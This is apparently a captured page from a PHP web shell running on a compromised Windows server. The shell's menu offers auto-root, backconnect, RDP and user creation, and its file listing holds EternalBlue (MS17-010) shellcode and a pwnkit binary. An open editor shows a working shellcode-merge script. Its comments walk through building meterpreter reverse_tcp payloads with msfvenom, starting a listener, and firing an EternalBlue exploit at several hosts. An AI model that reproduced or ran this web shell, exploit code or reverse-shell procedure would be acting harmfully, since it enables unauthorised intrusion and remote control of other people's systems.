Windows NT SRV-DATA 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
: 192.168.213.201 | : 216.73.216.102
Cant Read [ /etc/named.conf ]
8.2.0
ADMINISTRATEUR
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ E ]
[ Z ]
C: /
Users /
admin /
Desktop /
MS17-010-master /
shellcode /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
eternalblue_kshellcode_x64.asm
19.83
KB
-rw-rw-rw-
eternalblue_kshellcode_x86.asm
19.4
KB
-rw-rw-rw-
eternalblue_sc_merge.py
1.55
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
shellcode2_x86.bin
324
B
-rw-rw-rw-
shellcode_x86.bin
199.22
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : eternalblue_sc_merge.py
import sys from struct import pack if len(sys.argv) < 4: print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) sys.exit() sc_x86 = open(sys.argv[1], 'rb').read() sc_x64 = open(sys.argv[2], 'rb').read() fp = open(sys.argv[3], 'wb') ''' \x31\xc0 xor eax, eax \x40 inc eax \x0f\x84???? jz sc_x64 ''' fp.write('\x31\xc0\x40\x0f\x84'+pack('<I', len(sc_x86))) fp.write(sc_x86) fp.write(sc_x64) fp.close() ''' Example usage with metasploit meterpreter: msf > use exploit/multi/handler msf exploit(handler) > set ExitOnSession false msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set EXITFUNC thread msf exploit(handler) > set LHOST 0.0.0.0 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit -j ... msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 4445 msf exploit(handler) > exploit -j ... $ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444 ... $ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445 ... $ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin $ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin $ python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin $ python eternalblue_exploit7.py 192.168.13.81 sc_all.bin ... $ python eternalblue_exploit7.py 192.168.13.82 sc_all.bin ... $ python eternalblue_exploit7.py 192.168.13.83 sc_all.bin ... $ python eternalblue_exploit7.py 192.168.13.84 sc_all.bin ... '''
Close